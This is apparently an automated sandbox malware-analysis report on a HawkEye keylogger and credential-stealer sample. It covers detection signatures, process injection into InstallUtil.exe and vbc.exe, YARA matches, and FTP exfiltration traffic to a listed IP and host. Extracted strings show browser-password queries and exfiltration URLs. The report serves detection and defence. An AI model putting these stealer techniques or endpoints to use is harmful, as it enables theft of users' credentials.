
Windows Analysis Report FukQGQj7cl

Overview

General Information

Sample Name:FukQGQj7cl (renamed file extension from none to exe)
Analysis ID:462697
MD5:83f58ecf0778e3b0acca8497df23ef23
SHA1:a2123e816fcd387873272e022220fbc05b96d392
SHA256:437fae5aa2cad8ddb1fe3e316afdc6a1fdd2676084131fdc082ffdc8a53f066d
Tags:32exetrojan
Most interesting Screenshot:

Detection

HawkEye MailPassView
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected HawkEye Rat
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected AntiVM3
Yara detected HawkEye Keylogger
Yara detected MailPassView
.NET source code contains very large array initializations
Changes the view of files in windows explorer (hidden files and folders)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Injects a PE file into a foreign processes
Machine Learning detection for sample
Sample uses process hollowing technique
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file access)
Tries to steal Mail credentials (via file registry)
Writes to foreign memory regions
Yara detected WebBrowserPassView password recovery tool
AV process strings found (often used to terminate AV products)
Antivirus or Machine Learning detection for unpacked file
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May infect USB drives
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses FTP
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara signature match

Classification

Process Tree

  • System is w10x64
  • FukQGQj7cl.exe (PID: 4792 cmdline: 'C:\Users\user\Desktop\FukQGQj7cl.exe' MD5: 83F58ECF0778E3B0ACCA8497DF23EF23)
    • InstallUtil.exe (PID: 6284 cmdline: C:\Users\user\AppData\Local\Temp\InstallUtil.exe MD5: EFEC8C379D165E3F33B536739AEE26A3)
      • vbc.exe (PID: 6860 cmdline: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holdermail.txt' MD5: C63ED21D5706A527419C9FBD730FFB2E)
      • vbc.exe (PID: 6852 cmdline: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holderwb.txt' MD5: C63ED21D5706A527419C9FBD730FFB2E)
  • cleanup

Malware Configuration

Threatname: HawkEye

{"Modules": ["WebBrowserPassView"], "Version": ""}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000010.00000002.494750181.0000000004081000.00000004.00000001.sdmp | JoeSecurity_MailPassView | Yara detected MailPassView | Joe Security |
00000010.00000002.494750181.0000000004081000.00000004.00000001.sdmp | JoeSecurity_WebBrowserPassView | Yara detected WebBrowserPassView password recovery tool | Joe Security |
00000016.00000002.364855957.0000000000400000.00000040.00000001.sdmp | JoeSecurity_WebBrowserPassView | Yara detected WebBrowserPassView password recovery tool | Joe Security |
00000001.00000002.325532719.0000000004AC3000.00000004.00000001.sdmp | RAT_HawkEye | Detects HawkEye RAT | Kevin Breen <kevin@techanarchy.net> | strings:
  • 0x7ba5a:$key: HawkEyeKeylogger
  • 0xfdd18:$key: HawkEyeKeylogger
  • 0x7dc58:$salt: 099u787978786
  • 0xfff16:$salt: 099u787978786
  • 0x7c073:$string1: HawkEye_Keylogger
  • 0x7cec6:$string1: HawkEye_Keylogger
  • 0x7dbb8:$string1: HawkEye_Keylogger
  • 0xfe331:$string1: HawkEye_Keylogger
  • 0xff184:$string1: HawkEye_Keylogger
  • 0xffe76:$string1: HawkEye_Keylogger
  • 0x7c45c:$string2: holdermail.txt
  • 0x7c47c:$string2: holdermail.txt
  • 0xfe71a:$string2: holdermail.txt
  • 0xfe73a:$string2: holdermail.txt
  • 0x7c39e:$string3: wallet.dat
  • 0x7c3b6:$string3: wallet.dat
  • 0x7c3cc:$string3: wallet.dat
  • 0xfe65c:$string3: wallet.dat
  • 0xfe674:$string3: wallet.dat
  • 0xfe68a:$string3: wallet.dat
  • 0x7d79a:$string4: Keylog Records
00000001.00000002.325532719.0000000004AC3000.00000004.00000001.sdmp | JoeSecurity_MailPassView | Yara detected MailPassView | Joe Security |
(31 entries in total; only the first rows are reproduced here)

Unpacked PEs

Source | Rule | Description | Author | Strings
16.2.InstallUtil.exe.8460000.11.raw.unpack | HKTL_NET_GUID_Stealer | Detects c# red/black-team tools via typelibguid | Arnim Rupp | strings:
  • 0x101b:$typelibguid0: 8fcd4931-91a2-4e18-849b-70de34ab75df
21.2.vbc.exe.400000.0.unpack | JoeSecurity_MailPassView | Yara detected MailPassView | Joe Security |
16.2.InstallUtil.exe.4089930.8.unpack | JoeSecurity_MailPassView | Yara detected MailPassView | Joe Security |
1.2.FukQGQj7cl.exe.4acafa7.10.unpack | JoeSecurity_WebBrowserPassView | Yara detected WebBrowserPassView password recovery tool | Joe Security |
1.2.FukQGQj7cl.exe.478476a.4.unpack | JoeSecurity_MailPassView | Yara detected MailPassView | Joe Security |
(100 entries in total; only the first rows are reproduced here)

Sigma Overview

System Summary:

Sigma detected: Possible Applocker Bypass
Source: Process started | Author: juju4 | Data: Command: C:\Users\user\AppData\Local\Temp\InstallUtil.exe, CommandLine: C:\Users\user\AppData\Local\Temp\InstallUtil.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\InstallUtil.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\InstallUtil.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\InstallUtil.exe, ParentCommandLine: 'C:\Users\user\Desktop\FukQGQj7cl.exe' , ParentImage: C:\Users\user\Desktop\FukQGQj7cl.exe, ParentProcessId: 4792, ProcessCommandLine: C:\Users\user\AppData\Local\Temp\InstallUtil.exe, ProcessId: 6284

Jbx Signature Overview

AV Detection:

Found malware configuration
Source: vbc.exe.6852.22.memstrmin | Malware Configuration Extractor: HawkEye {"Modules": ["WebBrowserPassView"], "Version": ""}
Multi AV Scanner detection for submitted file
Source: FukQGQj7cl.exe | Virustotal: Detection: 45%
Source: FukQGQj7cl.exe | ReversingLabs: Detection: 35%
Machine Learning detection for sample
Source: FukQGQj7cl.exe | Joe Sandbox ML: detected
Source: 16.2.InstallUtil.exe.400000.0.unpack | Avira: Label: TR/AD.MExecute.lzrac
Source: 16.2.InstallUtil.exe.400000.0.unpack | Avira: Label: SPR/Tool.MailPassView.473
Source: 1.2.FukQGQj7cl.exe.4ac319a.11.unpack | Avira: Label: TR/Inject.vcoldi
Source: 1.2.FukQGQj7cl.exe.48ba66a.6.unpack | Avira: Label: TR/Inject.vcoldi
Source: FukQGQj7cl.exe | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: unknown | HTTPS traffic detected: 142.250.185.196:443 -> 192.168.2.3:49715 version: TLS 1.0
Source: FukQGQj7cl.exe | Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT, HIGH_ENTROPY_VA
Source: Binary string: C:\Users\Jovan\Documents\Visual Studio 2010\Projects\Stealer\CMemoryExecute\CMemoryExecute\obj\Release\CMemoryExecute.pdb | source: FukQGQj7cl.exe, 00000001.00000002.325532719.0000000004AC3000.00000004.00000001.sdmp, InstallUtil.exe, 00000010.00000002.501178621.00000000084C0000.00000004.00000001.sdmp
Source: Binary string: InstallUtil.pdb\rvr hr_CorExeMainmscoree.dll | source: FukQGQj7cl.exe, 00000001.00000003.299838271.0000000006CE4000.00000004.00000001.sdmp, InstallUtil.exe, 00000010.00000000.297962667.0000000000D62000.00000002.00020000.sdmp, InstallUtil.exe.1.dr
Source: Binary string: f:\Projects\VS2005\mailpv\Release\mailpv.pdb | source: FukQGQj7cl.exe, 00000001.00000002.325532719.0000000004AC3000.00000004.00000001.sdmp, InstallUtil.exe, 00000010.00000002.494750181.0000000004081000.00000004.00000001.sdmp, vbc.exe
Source: Binary string: f:\Projects\VS2005\WebBrowserPassView\Release\WebBrowserPassView.pdb | source: FukQGQj7cl.exe, 00000001.00000002.325532719.0000000004AC3000.00000004.00000001.sdmp, InstallUtil.exe, 00000010.00000002.494750181.0000000004081000.00000004.00000001.sdmp, vbc.exe
Source: Binary string: InstallUtil.pdb | source: FukQGQj7cl.exe, 00000001.00000003.299838271.0000000006CE4000.00000004.00000001.sdmp, InstallUtil.exe, InstallUtil.exe.1.dr
Source: FukQGQj7cl.exe, 00000001.00000002.325532719.0000000004AC3000.00000004.00000001.sdmp | Binary or memory string: autorun.inf
Source: FukQGQj7cl.exe, 00000001.00000002.325532719.0000000004AC3000.00000004.00000001.sdmp | Binary or memory string: [autorun]
Source: InstallUtil.exe, 00000010.00000002.483743736.0000000000402000.00000040.00000001.sdmp | Binary or memory string: autorun.inf
Source: InstallUtil.exe, 00000010.00000002.483743736.0000000000402000.00000040.00000001.sdmp | Binary or memory string: [autorun]
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Code function: 21_2_00406EC3 FindFirstFileA,FindNextFileA,strlen,strlen,
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Code function: 22_2_00408441 FindFirstFileW,FindNextFileW,wcslen,wcslen,
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Code function: 22_2_00407E0E FindFirstFileW,FindNextFileW,FindClose,

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic | Snort IDS: 2020410 ET TROJAN HawkEye Keylogger FTP 192.168.2.3:49745 -> 45.141.152.18:21
Source: global traffic | TCP traffic: 192.168.2.3:49746 -> 45.141.152.18:62025
Source: Joe Sandbox View | IP Address: 45.141.152.18 45.141.152.18
Source: Joe Sandbox View | ASN Name: M247GB M247GB
Source: Joe Sandbox View | JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: unknown | FTP traffic detected: 45.141.152.18:21 -> 192.168.2.3:49745 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 6 of 50 allowed.220-Local time is now 10:48. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.220 You will be disconnected after 15 minutes of inactivity.
Source: unknown | HTTPS traffic detected: 142.250.185.196:443 -> 192.168.2.3:49715 version: TLS 1.0
Source: FukQGQj7cl.exe, 00000001.00000002.325532719.0000000004AC3000.00000004.00000001.sdmp, InstallUtil.exe, 00000010.00000002.494750181.0000000004081000.00000004.00000001.sdmp, vbc.exe, 00000016.00000002.364855957.0000000000400000.00000040.00000001.sdmp | String found in binary or memory: @nss3.dllSOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\seamonkey.exe%programfiles%\Sea MonkeySOFTWARE\Mozillamozilla%s\binPathToExe%programfiles%\Mozilla FirefoxSELECT id, hostname, httpRealm, formSubmitURL, usernameField, passwordField, encryptedUsername, encryptedPassword FROM moz_logins.---signons.txtsignons2.txtsignons3.txtsignons.sqlitenetmsg.dllUnknown Error\Error %d: %seditkernel32.dll... open %2.2X %s (%s)Microsoft_WinInetMicrosoft_WinInet_u7@dllhost.exetaskhost.exetaskhostex.exebhvContainersContainerIdNameHistoryContainer_%I64dAccessCountCreationTimeExpiryTimeAccessedTimeModifiedTimeUrlEntryIDvisited:Microsoft\Windows\WebCache\WebCacheV01.datMicrosoft\Windows\WebCache\WebCacheV24.dat0123456789ABCDEFURL index.datSoftware\Microsoft\Internet Explorer\IntelliForms\Storage2https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.facebook.com (Facebook)
Source: FukQGQj7cl.exe, 00000001.00000002.325532719.0000000004AC3000.00000004.00000001.sdmp, InstallUtil.exe, 00000010.00000002.494750181.0000000004081000.00000004.00000001.sdmp, vbc.exe, 00000016.00000002.364855957.0000000000400000.00000040.00000001.sdmp | String found in binary or memory: @nss3.dllSOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\seamonkey.exe%programfiles%\Sea MonkeySOFTWARE\Mozillamozilla%s\binPathToExe%programfiles%\Mozilla FirefoxSELECT id, hostname, httpRealm, formSubmitURL, usernameField, passwordField, encryptedUsername, encryptedPassword FROM moz_logins.---signons.txtsignons2.txtsignons3.txtsignons.sqlitenetmsg.dllUnknown Error\Error %d: %seditkernel32.dll... open %2.2X %s (%s)Microsoft_WinInetMicrosoft_WinInet_u7@dllhost.exetaskhost.exetaskhostex.exebhvContainersContainerIdNameHistoryContainer_%I64dAccessCountCreationTimeExpiryTimeAccessedTimeModifiedTimeUrlEntryIDvisited:Microsoft\Windows\WebCache\WebCacheV01.datMicrosoft\Windows\WebCache\WebCacheV24.dat0123456789ABCDEFURL index.datSoftware\Microsoft\Internet Explorer\IntelliForms\Storage2https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.yahoo.com (Yahoo)
Source: vbc.exe | String found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
Source: unknown | DNS traffic detected: queries for: www.google.com
Source: FukQGQj7cl.exe, 00000001.00000002.325532719.0000000004AC3000.00000004.00000001.sdmp, InstallUtil.exe, 00000010.00000002.494750181.0000000004081000.00000004.00000001.sdmp | String found in binary or memory: http://crl.comodoca.com/COMODOCodeSigningCA2.crl0r
Source: FukQGQj7cl.exe, 00000001.00000002.310372719.00000000013A2000.00000004.00000020.sdmp | String found in binary or memory: http://crl.pki.goog/gsr1/gsr1.crl0;
Source: FukQGQj7cl.exe, 00000001.00000002.310372719.00000000013A2000.00000004.00000020.sdmp | String found in binary or memory: http://crl.pki.goog/gtsr1/gtsr1.crl0W
Source: FukQGQj7cl.exe, 00000001.00000002.310372719.00000000013A2000.00000004.00000020.sdmp | String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
Source: FukQGQj7cl.exe, 00000001.00000002.310372719.00000000013A2000.00000004.00000020.sdmp | String found in binary or memory: http://crls.pki.goog/gts1c3/moVDfISia2k.crl0
Source: InstallUtil.exe, 00000010.00000003.314395304.00000000061EB000.00000004.00000001.sdmp, InstallUtil.exe, 00000010.00000002.498309994.00000000062C0000.00000002.00000001.sdmp | String found in binary or memory: http://fontfabrik.com
Source: InstallUtil.exe, 00000010.00000003.314578251.00000000061EB000.00000004.00000001.sdmp | String found in binary or memory: http://fontfabrik.comB
Source: InstallUtil.exe, 00000010.00000003.314280047.00000000061EB000.00000004.00000001.sdmp | String found in binary or memory: http://fontfabrik.comsUKAi
Source: InstallUtil.exe, 00000010.00000002.494142383.0000000003476000.00000004.00000001.sdmp | String found in binary or memory: http://ftp.badonfashoin.com
Source: FukQGQj7cl.exe, 00000001.00000003.306427088.0000000009950000.00000004.00000001.sdmp | String found in binary or memory: http://ns.ado/1
Source: FukQGQj7cl.exe, 00000001.00000003.230610513.000000000994A000.00000004.00000001.sdmp | String found in binary or memory: http://ns.ado/12A
Source: FukQGQj7cl.exe, 00000001.00000003.306427088.0000000009950000.00000004.00000001.sdmp | String found in binary or memory: http://ns.adobe.c/g
Source: FukQGQj7cl.exe, 00000001.00000003.230610513.000000000994A000.00000004.00000001.sdmp | String found in binary or memory: http://ns.adobe.c/g2A
Source: FukQGQj7cl.exe, 00000001.00000003.306427088.0000000009950000.00000004.00000001.sdmp | String found in binary or memory: http://ns.adobe.cobj
Source: FukQGQj7cl.exe, 00000001.00000003.230610513.000000000994A000.00000004.00000001.sdmp | String found in binary or memory: http://ns.adobe.cobj2A
Source: FukQGQj7cl.exe, 00000001.00000002.325532719.0000000004AC3000.00000004.00000001.sdmp, InstallUtil.exe, 00000010.00000002.494750181.0000000004081000.00000004.00000001.sdmp | String found in binary or memory: http://ocsp.comodoca.com0
Source: FukQGQj7cl.exe, 00000001.00000002.310372719.00000000013A2000.00000004.00000020.sdmp | String found in binary or memory: http://ocsp.digicert.com0:
Source: FukQGQj7cl.exe, 00000001.00000002.310372719.00000000013A2000.00000004.00000020.sdmp | String found in binary or memory: http://ocsp.msocsp.com0
Source: FukQGQj7cl.exe, 00000001.00000002.310372719.00000000013A2000.00000004.00000020.sdmp | String found in binary or memory: http://ocsp.pki.goog/gsr10)
Source: FukQGQj7cl.exe, 00000001.00000002.310372719.00000000013A2000.00000004.00000020.sdmp | String found in binary or memory: http://ocsp.pki.goog/gts1c301
Source: FukQGQj7cl.exe, 00000001.00000002.310372719.00000000013A2000.00000004.00000020.sdmp | String found in binary or memory: http://ocsp.pki.goog/gtsr100
Source: FukQGQj7cl.exe, 00000001.00000002.310372719.00000000013A2000.00000004.00000020.sdmp | String found in binary or memory: http://pki.goog/gsr1/gsr1.crt02
Source: FukQGQj7cl.exe, 00000001.00000002.310372719.00000000013A2000.00000004.00000020.sdmp | String found in binary or memory: http://pki.goog/repo/certs/gts1c3.der0
Source: FukQGQj7cl.exe, 00000001.00000002.310372719.00000000013A2000.00000004.00000020.sdmp | String found in binary or memory: http://pki.goog/repo/certs/gtsr1.der04
Source: FukQGQj7cl.exe, 00000001.00000002.312563898.0000000002ECF000.00000004.00000001.sdmp | String found in binary or memory: http://schema.org/WebPage
Source: FukQGQj7cl.exe, 00000001.00000002.312280965.0000000002EA1000.00000004.00000001.sdmp, InstallUtil.exe, 00000010.00000002.489551476.0000000003081000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: FukQGQj7cl.exe, 00000001.00000002.325532719.0000000004AC3000.00000004.00000001.sdmp, InstallUtil.exe, 00000010.00000002.483743736.0000000000402000.00000040.00000001.sdmp | String found in binary or memory: http://whatismyipaddress.com/-
Source: InstallUtil.exe, 00000010.00000003.319415666.00000000061E8000.00000004.00000001.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: InstallUtil.exe, 00000010.00000003.319806893.00000000061E9000.00000004.00000001.sdmp | String found in binary or memory: http://www.carterandcone.com
Source: InstallUtil.exe, 00000010.00000003.320005338.00000000061E7000.00000004.00000001.sdmp | String found in binary or memory: http://www.carterandcone.comLP
Source: InstallUtil.exe, 00000010.00000002.498309994.00000000062C0000.00000002.00000001.sdmp | String found in binary or memory: http://www.carterandcone.coml
Source: InstallUtil.exe, 00000010.00000002.498309994.00000000062C0000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com
Source: InstallUtil.exe, 00000010.00000002.498309994.00000000062C0000.00000002.00000001.sdmp, InstallUtil.exe, 00000010.00000003.326807641.00000000061DE000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers
Source: InstallUtil.exe, 00000010.00000003.326807641.00000000061DE000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/
Source: InstallUtil.exe, 00000010.00000002.498309994.00000000062C0000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/?
Source: InstallUtil.exe, 00000010.00000002.498309994.00000000062C0000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: InstallUtil.exe, 00000010.00000003.329177139.000000000620A000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmln-us
Source: InstallUtil.exe, 00000010.00000002.498309994.00000000062C0000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: InstallUtil.exe, 00000010.00000002.498309994.00000000062C0000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers8
Source: InstallUtil.exe, 00000010.00000002.498309994.00000000062C0000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers?
Source: InstallUtil.exe, 00000010.00000002.498309994.00000000062C0000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designersG
Source: InstallUtil.exe, 00000010.00000003.326807641.00000000061DE000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designersd
Source: InstallUtil.exe, 00000010.00000002.498309994.00000000062C0000.00000002.00000001.sdmp | String found in binary or memory: http://www.fonts.com
Source: InstallUtil.exe, 00000010.00000003.313190214.00000000061EB000.00000004.00000001.sdmp | String found in binary or memory: http://www.fonts.comcNUlA(
Source: InstallUtil.exe, 00000010.00000003.313322897.00000000061EB000.00000004.00000001.sdmp | String found in binary or memory: http://www.fonts.comicXU
Source: InstallUtil.exe, 00000010.00000002.498309994.00000000062C0000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn
Source: InstallUtil.exe, 00000010.00000002.498309994.00000000062C0000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: InstallUtil.exe, 00000010.00000002.498309994.00000000062C0000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: InstallUtil.exe, 00000010.00000002.498309994.00000000062C0000.00000002.00000001.sdmp | String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: InstallUtil.exe, 00000010.00000002.498309994.00000000062C0000.00000002.00000001.sdmp | String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: InstallUtil.exe, 00000010.00000002.498309994.00000000062C0000.00000002.00000001.sdmp | String found in binary or memory: http://www.goodfont.co.kr
Source: InstallUtil.exe, 00000010.00000002.498309994.00000000062C0000.00000002.00000001.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: vbc.exe, vbc.exe, 00000016.00000002.364855957.0000000000400000.00000040.00000001.sdmp | String found in binary or memory: http://www.nirsoft.net/
Source: InstallUtil.exe, 00000010.00000002.498309994.00000000062C0000.00000002.00000001.sdmp | String found in binary or memory: http://www.sajatypeworks.com
Source: InstallUtil.exe, 00000010.00000002.498309994.00000000062C0000.00000002.00000001.sdmp | String found in binary or memory: http://www.sakkal.com
Source: InstallUtil.exe, 00000010.00000002.498309994.00000000062C0000.00000002.00000001.sdmp | String found in binary or memory: http://www.sandoll.co.kr
Source: InstallUtil.exe, 00000010.00000002.489551476.0000000003081000.00000004.00000001.sdmp | String found in binary or memory: http://www.site.com/logs.php
Source: InstallUtil.exe, 00000010.00000002.498309994.00000000062C0000.00000002.00000001.sdmp, InstallUtil.exe, 00000010.00000003.315759111.00000000061EB000.00000004.00000001.sdmp | String found in binary or memory: http://www.tiro.com
Source: InstallUtil.exe, 00000010.00000003.315478837.00000000061EB000.00000004.00000001.sdmp | String found in binary or memory: http://www.tiro.comEUuA
Source: InstallUtil.exe, 00000010.00000003.315250712.00000000061EB000.00000004.00000001.sdmp | String found in binary or memory: http://www.tiro.comWUgA
Source: InstallUtil.exe, 00000010.00000003.315832509.00000000061EB000.00000004.00000001.sdmp | String found in binary or memory: http://www.tiro.comcomEUuA
Source: InstallUtil.exe, 00000010.00000003.315611989.00000000061EB000.00000004.00000001.sdmp | String found in binary or memory: http://www.tiro.comsUKAi
Source: InstallUtil.exe, 00000010.00000002.498309994.00000000062C0000.00000002.00000001.sdmp | String found in binary or memory: http://www.typography.netD
Source: InstallUtil.exe, 00000010.00000002.498309994.00000000062C0000.00000002.00000001.sdmp | String found in binary or memory: http://www.urwpp.deDPlease
Source: InstallUtil.exe, 00000010.00000002.498309994.00000000062C0000.00000002.00000001.sdmp | String found in binary or memory: http://www.zhongyicts.com.cn
Source: vbc.exe | String found in binary or memory: https://login.yahoo.com/config/login
Source: FukQGQj7cl.exe, 00000001.00000002.310372719.00000000013A2000.00000004.00000020.sdmp | String found in binary or memory: https://pki.goog/repository/0
Source: FukQGQj7cl.exe, 00000001.00000002.312280965.0000000002EA1000.00000004.00000001.sdmp | String found in binary or memory: https://www.google.com
Source: FukQGQj7cl.exe, 00000001.00000002.312280965.0000000002EA1000.00000004.00000001.sdmp | String found in binary or memory: https://www.google.com/
Source: vbc.exe | String found in binary or memory: https://www.google.com/accounts/servicelogin
Source: unknown | Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49715

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Yara detected HawkEye Keylogger
Source: Yara match | File source: 16.2.InstallUtil.exe.45fa72.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 16.2.InstallUtil.exe.408208.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.FukQGQj7cl.exe.4ac319a.11.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.FukQGQj7cl.exe.4ac319a.11.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.FukQGQj7cl.exe.4acafa7.10.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.FukQGQj7cl.exe.478476a.4.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.FukQGQj7cl.exe.48ba66a.6.unpack, type: UNPACKEDPE
Source: Yara match | File source: 16.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 16.2.InstallUtil.exe.409c0d.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.FukQGQj7cl.exe.4ac95a2.9.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.FukQGQj7cl.exe.472e905.5.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.FukQGQj7cl.exe.472cf00.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.FukQGQj7cl.exe.48ba66a.6.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.FukQGQj7cl.exe.48c0a72.8.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.FukQGQj7cl.exe.48c2477.7.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 16.2.InstallUtil.exe.30ab2a0.5.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000001.00000002.325532719.0000000004AC3000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.324877095.0000000004838000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.324260828.0000000004726000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000010.00000002.483743736.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000010.00000002.489551476.0000000003081000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: FukQGQj7cl.exe PID: 4792, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: InstallUtil.exe PID: 6284, type: MEMORYSTR
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Code function: 21_2_0040AC8A GetTempPathA,GetWindowsDirectoryA,GetTempFileNameA,OpenClipboard,GetLastError,DeleteFileA,
Source: FukQGQj7cl.exe, 00000001.00000002.309200167.000000000130A000.00000004.00000020.sdmp | Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

                  System Summary:

                  barindex
                  Malicious sample detected (through community Yara rule)Show sources
Source: 16.2.InstallUtil.exe.45fa72.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects HawkEye RAT, Author: Kevin Breen <kevin@techanarchy.net>
Source: 16.2.InstallUtil.exe.45fa72.1.raw.unpack, type: UNPACKEDPE | Matched rule: detect HawkEye in memory, Author: JPCERT/CC Incident Response Group
Source: 16.2.InstallUtil.exe.408208.2.raw.unpack, type: UNPACKEDPE | Matched rule: Detects HawkEye RAT, Author: Kevin Breen <kevin@techanarchy.net>
Source: 16.2.InstallUtil.exe.408208.2.raw.unpack, type: UNPACKEDPE | Matched rule: detect HawkEye in memory, Author: JPCERT/CC Incident Response Group
Source: 1.2.FukQGQj7cl.exe.4ac319a.11.unpack, type: UNPACKEDPE | Matched rule: Detects HawkEye RAT, Author: Kevin Breen <kevin@techanarchy.net>
Source: 1.2.FukQGQj7cl.exe.4ac319a.11.unpack, type: UNPACKEDPE | Matched rule: detect HawkEye in memory, Author: JPCERT/CC Incident Response Group
Source: 1.2.FukQGQj7cl.exe.4ac319a.11.raw.unpack, type: UNPACKEDPE | Matched rule: Detects HawkEye RAT, Author: Kevin Breen <kevin@techanarchy.net>
Source: 1.2.FukQGQj7cl.exe.4ac319a.11.raw.unpack, type: UNPACKEDPE | Matched rule: detect HawkEye in memory, Author: JPCERT/CC Incident Response Group
Source: 1.2.FukQGQj7cl.exe.4acafa7.10.raw.unpack, type: UNPACKEDPE | Matched rule: Detects HawkEye RAT, Author: Kevin Breen <kevin@techanarchy.net>
Source: 1.2.FukQGQj7cl.exe.4acafa7.10.raw.unpack, type: UNPACKEDPE | Matched rule: detect HawkEye in memory, Author: JPCERT/CC Incident Response Group
Source: 1.2.FukQGQj7cl.exe.478476a.4.raw.unpack, type: UNPACKEDPE | Matched rule: Detects HawkEye RAT, Author: Kevin Breen <kevin@techanarchy.net>
Source: 1.2.FukQGQj7cl.exe.478476a.4.raw.unpack, type: UNPACKEDPE | Matched rule: detect HawkEye in memory, Author: JPCERT/CC Incident Response Group
Source: 1.2.FukQGQj7cl.exe.48ba66a.6.unpack, type: UNPACKEDPE | Matched rule: Detects HawkEye RAT, Author: Kevin Breen <kevin@techanarchy.net>
